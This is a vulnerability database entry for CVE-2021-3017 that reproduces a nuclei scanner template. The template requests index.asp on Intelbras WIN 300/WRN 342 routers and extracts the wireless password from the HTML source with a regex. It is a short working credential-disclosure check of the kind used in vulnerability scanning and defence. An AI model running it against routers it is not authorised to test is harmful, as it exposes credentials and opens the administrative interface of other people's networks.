Lucene search
K

Intelbras WIN 300/WRN 342 - Credentials Disclosure

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Intelbras WIN 300/WRN 342 devices allow remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code, leading to unauthorized access to the administrative interface and potential network compromise

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-3017
14 Apr 202118:15
attackerkb
Circl
CVE-2021-3017
7 May 202108:28
circl
CNNVD
Intelbras IWR 3000N 安全漏洞
14 Apr 202100:00
cnnvd
CVE
CVE-2021-3017
14 Apr 202117:17
cve
Cvelist
CVE-2021-3017
14 Apr 202117:17
cvelist
NVD
CVE-2021-3017
14 Apr 202118:15
nvd
OSV
CVE-2021-3017
14 Apr 202118:15
osv
Prion
Code injection
14 Apr 202118:15
prion
RedhatCVE
CVE-2021-3017
22 May 202519:38
redhatcve
id: CVE-2021-3017

info:
  name: Intelbras WIN 300/WRN 342 - Credentials Disclosure
  author: pikpikcu
  severity: high
  description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
  impact: |
    An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network.
  remediation: |
    Update the router firmware to the latest version, which includes a fix for the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3017
    - https://pastebin.com/cTYTf0Yn
    - https://github.com/bigblackhat/oFx
    - https://github.com/openx-org/BLEN
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3017
    epss-score: 0.63023
    epss-percentile: 0.99097
    cpe: cpe:2.3:h:intelbras:win_300:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: intelbras
    product: win_300
  tags: cve2021,cve,exposure,router,intelbras,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.asp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'def_wirelesspassword ='
          - '<title>Roteador Wireless</title>'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - 'def_wirelesspassword = "([A-Za-z0-9=]+)";'
        part: body
# digest: 490a00463044022073a690dbbd5da48b1f70c26e4e1677a35b96379e35c898b32729488b84362720022035fc6b7b40d67abc2a288a2d97b17501a431d10b78603343b461ec39015b79fe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.63023
31